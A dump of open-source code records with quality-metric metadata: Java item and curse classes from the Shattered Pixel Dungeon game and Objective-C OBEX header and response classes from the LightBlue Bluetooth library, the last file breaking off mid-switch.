| 2,896 | ElixirOfHoneyedHealing | java | en | java | code | {"qsc_code_num_words": 357, "qsc_code_num_chars": 2896.0, "qsc_code_mean_word_length": 6.08683473, "qsc_code_frac_words_unique": 0.45098039, "qsc_code_frac_chars_top_2grams": 0.109526, "qsc_code_frac_chars_top_3grams": 0.24482283, "qsc_code_frac_chars_top_4grams": 0.24298205, "qsc_code_frac_chars_dupe_5grams": 0.32581684, "qsc_code_frac_chars_dupe_6grams": 0.1504832, "qsc_code_frac_chars_dupe_7grams": 0.02577082, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01697656, "qsc_code_frac_chars_whitespace": 0.14571823, "qsc_code_size_file_byte": 2896.0, "qsc_code_num_lines": 89.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 32.53932584, "qsc_code_frac_chars_alphabet": 0.86135812, "qsc_code_frac_chars_comments": 0.27727901, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.05555556, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05555556, "qsc_codejava_score_lines_no_logic": 0.31481481, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfMight.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.Badges;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.AlchemicalCatalyst;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfStrength;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.BuffIndicator;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.utils.Bundle;
public class ElixirOfMight extends Elixir {
{
image = ItemSpriteSheet.ELIXIR_MIGHT;
}
@Override
public void apply( Hero hero ) {
setKnown();
hero.STR++;
Buff.affect(hero, HTBoost.class).reset();
HTBoost boost = Buff.affect(hero, HTBoost.class);
boost.reset();
hero.updateHT( true );
hero.sprite.showStatus( CharSprite.POSITIVE, Messages.get(this, "msg_1", boost.boost() ));
GLog.p( Messages.get(this, "msg_2") );
Badges.validateStrengthAttained();
}
public String desc() {
return Messages.get(this, "desc", HTBoost.boost(Dungeon.hero.HT));
}
@Override
public int price() {
//prices of ingredients
return quantity * (50 + 40);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfStrength.class, AlchemicalCatalyst.class};
inQuantity = new int[]{1, 1};
cost = 5;
output = ElixirOfMight.class;
outQuantity = 1;
}
}
public static class HTBoost extends Buff {
{
type = buffType.POSITIVE;
}
private int left;
public void reset(){
left = 5;
}
public int boost(){
return Math.round(left*boost(target.HT)/5f);
}
public static int boost(int HT){
return Math.round(4 + HT/20f);
}
public void onLevelUp(){
left --;
if (left <= 0){
detach();
}
}
@Override
public int icon() {
return BuffIndicator.HEALING;
}
@Override
public String toString() {
return Messages.get(this, "name");
}
@Override
public String desc() {
return Messages.get(this, "desc", boost(), left);
}
private static String LEFT = "left";
@Override
public void storeInBundle(Bundle bundle) {
super.storeInBundle(bundle);
bundle.put( LEFT, left );
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
left = bundle.getInt(LEFT);
}
}
}
| 3,572 | ElixirOfMight | java | en | java | code | {"qsc_code_num_words": 418, "qsc_code_num_chars": 3572.0, "qsc_code_mean_word_length": 6.16267943, "qsc_code_frac_words_unique": 0.41148325, "qsc_code_frac_chars_top_2grams": 0.08579193, "qsc_code_frac_chars_top_3grams": 0.19177019, "qsc_code_frac_chars_top_4grams": 0.1878882, "qsc_code_frac_chars_dupe_5grams": 0.24534161, "qsc_code_frac_chars_dupe_6grams": 0.09704969, "qsc_code_frac_chars_dupe_7grams": 0.0318323, "qsc_code_frac_chars_dupe_8grams": 0.0318323, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01118265, "qsc_code_frac_chars_whitespace": 0.17385218, "qsc_code_size_file_byte": 3572.0, "qsc_code_num_lines": 139.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 25.69784173, "qsc_code_frac_chars_alphabet": 0.86174178, "qsc_code_frac_chars_comments": 0.22508399, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00939306, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.13333333, "qsc_codejava_score_lines_no_logic": 0.28888889, "qsc_codejava_frac_words_no_modifier": 0.92307692, "qsc_codejava_frac_words_legal_var_name": 0.66666667, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfArcaneArmor.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.ArcaneArmor;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic.PotionOfEarthenArmor;
import com.shatteredpixel.shatteredpixeldungeon.items.quest.GooBlob;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class ElixirOfArcaneArmor extends Elixir {
{
image = ItemSpriteSheet.ELIXIR_ARCANE;
}
@Override
public void apply(Hero hero) {
Buff.affect(hero, ArcaneArmor.class).set(5 + hero.lvl/2, 80);
}
@Override
public int price() {
//prices of ingredients
return quantity * (50 + 40);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfEarthenArmor.class, GooBlob.class};
inQuantity = new int[]{1, 1};
cost = 8;
output = ElixirOfArcaneArmor.class;
outQuantity = 1;
}
}
}
| 1,910 | ElixirOfArcaneArmor | java | en | java | code | {"qsc_code_num_words": 237, "qsc_code_num_chars": 1910.0, "qsc_code_mean_word_length": 6.10970464, "qsc_code_frac_words_unique": 0.55274262, "qsc_code_frac_chars_top_2grams": 0.09392265, "qsc_code_frac_chars_top_3grams": 0.20994475, "qsc_code_frac_chars_top_4grams": 0.18232044, "qsc_code_frac_chars_dupe_5grams": 0.27417127, "qsc_code_frac_chars_dupe_6grams": 0.11464088, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01801242, "qsc_code_frac_chars_whitespace": 0.15706806, "qsc_code_size_file_byte": 1910.0, "qsc_code_num_lines": 61.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 31.31147541, "qsc_code_frac_chars_alphabet": 0.88136646, "qsc_code_frac_chars_comments": 0.42041885, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.06896552, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.06896552, "qsc_codejava_score_lines_no_logic": 0.31034483, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/armor/curses/AntiEntropy.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.armor.curses;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Burning;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Frost;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.FlameParticle;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.SnowParticle;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor.Glyph;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite.Glowing;
import com.watabou.utils.Random;
public class AntiEntropy extends Glyph {
private static ItemSprite.Glowing BLACK = new ItemSprite.Glowing( 0x000000 );
@Override
public int proc( Armor armor, Char attacker, Char defender, int damage) {
if (Random.Int( 8 ) == 0) {
if (Dungeon.level.adjacent( attacker.pos, defender.pos )) {
Buff.prolong(attacker, Frost.class, Frost.duration(attacker) * Random.Float(0.5f, 1f));
CellEmitter.get(attacker.pos).start(SnowParticle.FACTORY, 0.2f, 6);
}
Buff.affect( defender, Burning.class ).reignite( defender );
defender.sprite.emitter().burst( FlameParticle.FACTORY, 5 );
}
return damage;
}
@Override
public Glowing glowing() {
return BLACK;
}
@Override
public boolean curse() {
return true;
}
}
| 2,473 | AntiEntropy | java | en | java | code | {"qsc_code_num_words": 303, "qsc_code_num_chars": 2473.0, "qsc_code_mean_word_length": 6.35643564, "qsc_code_frac_words_unique": 0.47194719, "qsc_code_frac_chars_top_2grams": 0.11474559, "qsc_code_frac_chars_top_3grams": 0.25649013, "qsc_code_frac_chars_top_4grams": 0.2741433, "qsc_code_frac_chars_dupe_5grams": 0.39252336, "qsc_code_frac_chars_dupe_6grams": 0.30166147, "qsc_code_frac_chars_dupe_7grams": 0.06126687, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01534884, "qsc_code_frac_chars_whitespace": 0.13061059, "qsc_code_size_file_byte": 2473.0, "qsc_code_num_lines": 68.0, "qsc_code_num_chars_line_max": 92.0, "qsc_code_num_chars_line_mean": 36.36764706, "qsc_code_frac_chars_alphabet": 0.88046512, "qsc_code_frac_chars_comments": 0.31581076, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08108108, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00472813, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.08108108, "qsc_codejava_score_lines_no_logic": 0.54054054, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 1, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBOBEXHeaderSet.h | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBOBEXHeaderSet.h
// LightAquaBlue
//
// A collection of unique OBEX headers.
//
// The mutable counterpart to this class is BBMutableOBEXHeaderSet.
//
#import <Cocoa/Cocoa.h>
#import <CoreFoundation/CoreFoundation.h>
#import <IOBluetooth/OBEX.h>
@interface BBOBEXHeaderSet : NSObject {
NSMutableDictionary *mDict;
NSMutableArray *mKeys;
}
/*
* Creates and returns an empty header set.
*/
+ (id)headerSet;
/*
* Returns whether this header set contains the header with <headerID>.
*
* Common header IDs are defined in the OBEXHeaderIdentifiers enum in
* <IOBluetooth/OBEX.h> (for example, kOBEXHeaderIDName).
*/
- (BOOL)containsValueForHeader:(uint8_t)headerID;
/*
* Returns the number of headers in this header set.
*/
- (unsigned)count;
/*
* Returns the "Count" header value, or 0 if the header is not present or cannot
* be read.
*/
- (unsigned int)valueForCountHeader;
/*
* Returns the value for the Name header, or nil if the header is not present or
* cannot be read.
*/
- (NSString *)valueForNameHeader;
/*
* Returns the value for the Type header, or nil if the header is not present or
* cannot be read.
*/
- (NSString *)valueForTypeHeader;
/*
* Returns the value for the Length header, or 0 if the header is not present or
* cannot be read.
*/
- (unsigned int)valueForLengthHeader;
/*
* Returns the value for the 0x44 Time header, or the 0xC4 value if the 0x44
* header is not present, or nil if neither header is present or cannot be read.
*/
- (NSDate *)valueForTimeHeader;
/*
* Returns the value for the Description header, or nil if the header is not
* present or cannot be read.
*/
- (NSString *)valueForDescriptionHeader;
/*
* Returns the value for the Target header, or nil if the header is not present
* or cannot be read.
*/
- (NSData *)valueForTargetHeader;
/*
* Returns the value for the HTTP header, or nil if the header is not present
* or cannot be read.
*/
- (NSData *)valueForHTTPHeader;
/*
* Returns the value for the Who header, or nil if the header is not present
* or cannot be read.
*/
- (NSData *)valueForWhoHeader;
/*
* Returns the value for the Connection Id header, or 0 if the header is not
* present or cannot be read.
*/
- (uint32_t)valueForConnectionIDHeader;
/*
* Returns the value for the Application Parameters header, or nil if the
* header is not present or cannot be read.
*/
- (NSData *)valueForApplicationParametersHeader;
/*
* Returns the value for the Authorization Challenge header, or nil if the
* header is not present or cannot be read.
*/
- (NSData *)valueForAuthorizationChallengeHeader;
/*
* Returns the value for the Authorization Response header, or nil if the
* header is not present or cannot be read.
*/
- (NSData *)valueForAuthorizationResponseHeader;
/*
* Returns the value for the Object Class header, or nil if the
* header is not present or cannot be read.
*/
- (NSData *)valueForObjectClassHeader;
/*
* Returns the value for the 4-byte header <headerID>, or 0 if the header is
* not present or cannot be read as a 4-byte value.
*/
- (unsigned int)valueFor4ByteHeader:(uint8_t)headerID;
/*
* Returns the value for the byte-sequence header <headerID>, or nil if the
* header is not present or cannot be read as a byte-sequence value.
*/
- (NSData *)valueForByteSequenceHeader:(uint8_t)headerID;
/*
* Returns the value for the 1-byte header <headerID>, or 0 if the header is
* not present or cannot be read as a 1-byte value.
*/
- (uint8_t)valueFor1ByteHeader:(uint8_t)headerID;
/*
* Returns the value for the unicode header <headerID>, or nil if the
* header is not present or cannot be read as a unicode value.
*/
- (NSString *)valueForUnicodeHeader:(uint8_t)headerID;
/*
* Returns all the headers in the header set as a list of NSNumber objects.
* Each NSNumber contains an unsigned char value (the header ID).
*
* The headers are returned in the order in which they were added.
*/
- (NSArray *)allHeaders;
/*
* Returns a stream of bytes that contain the headers in this header set, as
* specified by the IrOBEX specification (section 2.1).
*/
- (NSMutableData *)toBytes;
@end
| 4,908 | BBOBEXHeaderSet | h | en | c | code | {"qsc_code_num_words": 700, "qsc_code_num_chars": 4908.0, "qsc_code_mean_word_length": 5.04285714, "qsc_code_frac_words_unique": 0.28285714, "qsc_code_frac_chars_top_2grams": 0.0509915, "qsc_code_frac_chars_top_3grams": 0.05609065, "qsc_code_frac_chars_top_4grams": 0.0917847, "qsc_code_frac_chars_dupe_5grams": 0.4407932, "qsc_code_frac_chars_dupe_6grams": 0.33116147, "qsc_code_frac_chars_dupe_7grams": 0.29603399, "qsc_code_frac_chars_dupe_8grams": 0.29603399, "qsc_code_frac_chars_dupe_9grams": 0.26628895, "qsc_code_frac_chars_dupe_10grams": 0.26628895, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00857287, "qsc_code_frac_chars_whitespace": 0.19193154, "qsc_code_size_file_byte": 4908.0, "qsc_code_num_lines": 179.0, "qsc_code_num_chars_line_max": 82.0, "qsc_code_num_chars_line_mean": 27.41899441, "qsc_code_frac_chars_alphabet": 0.88149269, "qsc_code_frac_chars_comments": 0.76548492, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBOBEXResponse.m | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBOBEXResponse.m
// LightAquaBlue
//
#import "BBOBEXResponse.h"
#import "BBOBEXHeaderSet.h"
@implementation BBOBEXResponse
+ (id)responseWithCode:(int)responseCode
headers:(BBOBEXHeaderSet *)headers
{
return [[[BBOBEXResponse alloc] initWithCode:responseCode
headers:headers] autorelease];
}
- (id)initWithCode:(int)responseCode
headers:(BBOBEXHeaderSet *)headers
{
self = [super init];
mCode = responseCode;
mHeaders = [headers retain];
return self;
}
- (int)responseCode
{
return mCode;
}
- (NSString *)responseCodeDescription
{
switch (mCode) {
case kOBEXResponseCodeContinueWithFinalBit:
